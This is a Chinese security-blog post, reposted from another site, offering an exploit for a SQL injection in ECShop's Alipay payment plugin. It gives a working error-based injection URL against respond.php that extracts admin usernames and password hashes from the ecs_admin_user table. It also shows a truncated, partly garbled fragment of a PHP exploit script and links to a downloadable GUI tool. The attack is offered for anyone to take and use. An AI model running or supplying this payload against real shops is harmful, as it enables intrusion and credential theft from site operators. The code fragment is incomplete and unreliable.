ecshop支付宝插件注入EXP

独自等待 2017年5月12日02:07:25评论441 views字数 649阅读2分9秒阅读模式

漏洞是比较老的漏洞,最初由360暴出来的,数字公司大牛还是很多的。网上也有N多exp了,之前在k8看到了gui的利用工具,研究了一下,也整了个php版的exp,喜欢的拿去。

由于漏洞源于ecshop的支付宝支付插件,所有利用前提是站点安装此插件,利用不受GPC影响。

漏洞核心代码在\includes\modules\payment\alipay.php 文件 respond()函数,第215行。

ecshop支付宝插件注入

最终利用EXP:

http://localhost/ecshop/respond.php?code=alipay&subject=0&out_trade_no=%00′ and (select * from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecs_admin_user limit 1))a from information_schema.tables group by a)b) — By seay

小弟写的EXP奉上……

' . $errstr . "\n";
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}

//时间统计函数
function func_time()
{
    list($microsec, $sec) = explode(' ', microtime());
    return $microsec + $sec;
}

echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
?>

GUI版下载:点我下载

参考网站:

http://www.cnseay.com/2237/

http://bbs.webscan.360.cn/forum.php?mod=viewthread&tid=3807

http://qqhack8.blog.163.com/blog/static/1141479852013122726876/



from www.waitalone.cn.thanks for it.

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
独自等待
  • 本文由 发表于 2017年5月12日02:07:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ecshop支付宝插件注入EXPhttps://cn-sec.com/archives/50319.html

发表评论

匿名网友 填写信息